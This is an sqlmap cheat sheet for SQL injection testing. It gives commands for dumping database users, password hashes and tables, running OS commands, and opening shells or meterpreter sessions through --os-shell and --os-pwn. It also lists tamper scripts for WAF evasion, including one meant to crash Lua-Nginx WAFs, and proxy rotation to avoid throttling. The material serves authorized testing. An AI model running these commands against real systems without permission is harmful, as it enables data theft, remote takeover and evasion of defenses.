SQLMap


Basic SQLmap arguments

Generic

-u "<URL>"
-p "<PARAM TO TEST>"
--user-agent=SQLMAP
--random-agent
--threads=10
--risk=3 #MAX
--level=5 #MAX
--dbms="<KNOWN DB TECH>"
--os="<OS>"
--technique="UB" #Use only techniques UNION and BLIND in that order (default "BEUSTQ")
--batch #Non interactive mode, usually Sqlmap will ask you questions, this accepts the default answers
--auth-type="<AUTH>" #HTTP authentication type (Basic, Digest, NTLM or PKI)
--auth-cred="<AUTH>" #HTTP authentication credentials (name:password)
--proxy=PROXY

Technique flags (--technique)

The --technique argument specifies which SQL injection techniques sqlmap will try. Each letter in the string represents one technique:

| Letter | Technique | Description |
|---|---|---|
| B | Boolean-based blind | Uses true/false conditions to infer data |
| E | Error-based | Uses verbose DBMS error messages to exfiltrate results |
| U | UNION query | Injects UNION SELECT statements to retrieve data through the same channel |
| S | Stacked queries | Appends additional statements separated by ; |
| T | Time-based blind | Relies on delays (SLEEP, WAITFOR) to detect the injection |
| Q | Inline / out-of-band | Uses functions such as LOAD_FILE() or OOB channels such as DNS |

The default order is BEUSTQ. You can reorder or reduce the set, for example Boolean and Time-based only, in that order:

sqlmap -u "http://target/?id=1" --technique="BT" --batch

Retrieve information

Internal

--current-user #Get current user
--is-dba #Check if current user is Admin
--hostname #Get hostname
--users #Get usernames of DB
--passwords #Get passwords of users in DB

DB data

--all #Retrieve everything
--dump #Dump DBMS database table entries
--dbs #Names of the available databases
--tables #Tables of a database ( -D <DB NAME> )
--columns #Columns of a table  ( -D <DB NAME> -T <TABLE NAME> )
-D <DB NAME> -T <TABLE NAME> -C <COLUMN NAME> #Dump column

Injection place

From a Burp/ZAP capture

Capture the request and save it as a file named req.txt

sqlmap -r req.txt --current-user

GET Request Injection

sqlmap -u "http://example.com/?id=1" -p id
sqlmap -u "http://example.com/?id=*" -p id

POST Request Injection

sqlmap -u "http://example.com" --data "username=*&password=*"

Injections in headers and other HTTP methods

#Inside cookie
sqlmap  -u "http://example.com" --cookie "mycookies=*"

#Inside some header
sqlmap -u "http://example.com" --headers="x-forwarded-for:127.0.0.1*"
sqlmap -u "http://example.com" --headers="referer:*"

#PUT Method
sqlmap --method=PUT -u "http://example.com" --headers="referer:*"

#The injection is located at the '*'

Second order injection

python sqlmap.py -r /tmp/r.txt --dbms MySQL --second-order "http://targetapp/wishlist" -v 3
sqlmap -r 1.txt --dbms MySQL --second-order "http://<IP/domain>/joomla/administrator/index.php" -D "joomla" --dbs

Shell

#Exec command
python sqlmap.py -u "http://example.com/?id=1" -p id --os-cmd whoami

#Simple Shell
python sqlmap.py -u "http://example.com/?id=1" -p id --os-shell

#Dropping a reverse-shell / meterpreter
python sqlmap.py -u "http://example.com/?id=1" -p id --os-pwn

Crawl a website with SQLmap and auto-exploit

sqlmap -u "http://example.com/" --crawl=1 --random-agent --batch --forms --threads=5 --level=5 --risk=3

--batch = non interactive mode, usually Sqlmap will ask you questions, this accepts the default answers
--crawl = how deep you want to crawl a site
--forms = Parse and test forms

Customizing the injection

Set a suffix

python sqlmap.py -u "http://example.com/?id=1"  -p id --suffix="-- "

Set a prefix

python sqlmap.py -u "http://example.com/?id=1"  -p id --prefix="') "

Help with finding a boolean injection

# --not-string "string" helps find a string that does not appear in True responses (useful for finding boolean-based blind injection)
sqlmap -r r.txt -p id --not-string ridiculous --batch

Tamper

--tamper=name_of_the_tamper
#In kali you can see all the tampers in /usr/share/sqlmap/tamper

| Tamper | Description |
|---|---|
| apostrophemask.py | Replaces the apostrophe character with its UTF-8 full width counterpart |
| apostrophenullencode.py | Replaces the apostrophe character with its illegal double unicode counterpart |
| appendnullbyte.py | Appends an encoded NULL byte character at the end of the payload |
| base64encode.py | Base64-encodes all characters in the given payload |
| between.py | Replaces the greater than operator ('>') with 'NOT BETWEEN 0 AND #' |
| bluecoat.py | Replaces the space after an SQL statement with a valid random blank character. Afterwards replaces the = character with the LIKE operator |
| chardoubleencode.py | Double url-encodes all characters in the given payload (not processing already encoded) |
| commalesslimit.py | Replaces instances like 'LIMIT M, N' with 'LIMIT N OFFSET M' |
| commalessmid.py | Replaces instances like 'MID(A, B, C)' with 'MID(A FROM B FOR C)' |
| concat2concatws.py | Replaces instances like 'CONCAT(A, B)' with 'CONCAT_WS(MID(CHAR(0), 0, 0), A, B)' |
| charencode.py | Url-encodes all characters in the given payload (not processing already encoded) |
| charunicodeencode.py | Unicode-url-encodes non-encoded characters in the given payload (not processing already encoded). "%u0022" |
| charunicodeescape.py | Unicode-escapes non-encoded characters in the given payload (not processing already encoded). "\u0022" |
| equaltolike.py | Replaces all occurrences of the equal operator ('=') with the 'LIKE' operator |
| escapequotes.py | Slash-escapes quotes (' and ") |
| greatest.py | Replaces the greater than operator ('>') with its 'GREATEST' counterpart |
| halfversionedmorekeywords.py | Adds a versioned MySQL comment before each keyword |
| ifnull2ifisnull.py | Replaces instances like 'IFNULL(A, B)' with 'IF(ISNULL(A), B, A)' |
| modsecurityversioned.py | Wraps the complete query with a versioned comment |
| modsecurityzeroversioned.py | Wraps the complete query with a zero-versioned comment |
| multiplespaces.py | Adds multiple spaces around SQL keywords |
| nonrecursivereplacement.py | Replaces predefined SQL keywords with representations suitable for replacement filters (e.g. .replace("SELECT", "")) |
| percentage.py | Adds a percentage sign ('%') in front of each character |
| overlongutf8.py | Converts all characters in the given payload to overlong UTF-8 (not processing already encoded) |
| randomcase.py | Replaces each keyword character with a random-case value |
| randomcomments.py | Adds random comments to SQL keywords |
| securesphere.py | Appends a specially crafted string |
| sp_password.py | Appends 'sp_password' to the end of the payload for automatic obfuscation from DBMS logs |
| space2comment.py | Replaces the space character (' ') with comments |
| space2dash.py | Replaces the space character (' ') with a dash comment ('--') followed by a random string and a new line ('\n') |
| space2hash.py | Replaces the space character (' ') with a pound character ('#') followed by a random string and a new line ('\n') |
| space2morehash.py | Replaces the space character (' ') with a pound character ('#') followed by a random string and a new line ('\n') |
| space2mssqlblank.py | Replaces the space character (' ') with a random blank character from a valid set of alternate characters |
| space2mssqlhash.py | Replaces the space character (' ') with a pound character ('#') followed by a new line ('\n') |
| space2mysqlblank.py | Replaces the space character (' ') with a random blank character from a valid set of alternate characters |
| space2mysqldash.py | Replaces the space character (' ') with a dash comment ('--') followed by a new line ('\n') |
| space2plus.py | Replaces the space character (' ') with a plus ('+') |
| space2randomblank.py | Replaces the space character (' ') with a random blank character from a valid set of alternate characters |
| symboliclogical.py | Replaces the AND and OR logical operators with their symbolic counterparts (&& and \|\|) |
| unionalltounion.py | Replaces UNION ALL SELECT with UNION SELECT |
| unmagicquotes.py | Replaces the quote character (') with the multi-byte combo %bf%27 together with a generic comment at the end (to make it work) |
| uppercase.py | Replaces each keyword character with its upper-case value, e.g. 'INSERT' |
| varnish.py | Appends the HTTP header 'X-originating-IP' |
| versionedkeywords.py | Encloses each non-function keyword with a versioned MySQL comment |
| versionedmorekeywords.py | Encloses each keyword with a versioned MySQL comment |
| xforwardedfor.py | Appends a fake HTTP header 'X-Forwarded-For' |
| luanginxmore.py | POST-only tamper that prepends millions of dummy parameters before your payload to exhaust Lua-Nginx WAF parsers (e.g. Cloudflare) |

luanginxmore generates roughly ~4.2M random POST parameters before your payload; use it only together with --method=POST and expect a very large request size that can crash misconfigured Lua-Nginx WAFs.

Recent switches worth enabling (>=1.9.x)

  • HTTP/2 transport: --http2 forces sqlmap to speak HTTP/2 (helps against front-ends that rate-limit HTTP/1.1 but relax the limits for h2). Combine it with --force-ssl to force HTTPS.
  • Proxy rotation: --proxy-file proxies.txt --proxy-freq 3 rotates through the list, switching proxy every 3 requests to avoid IP-based throttling.
  • Offline / purge modes: --offline replays stored session data without touching the target (zero network traffic), while --purge securely wipes the session/output directory when you are done.
  • Mobile UA emulation: --mobile prompts you to imitate a popular smartphone User-Agent, useful for APIs that expose extra fields to mobile clients.
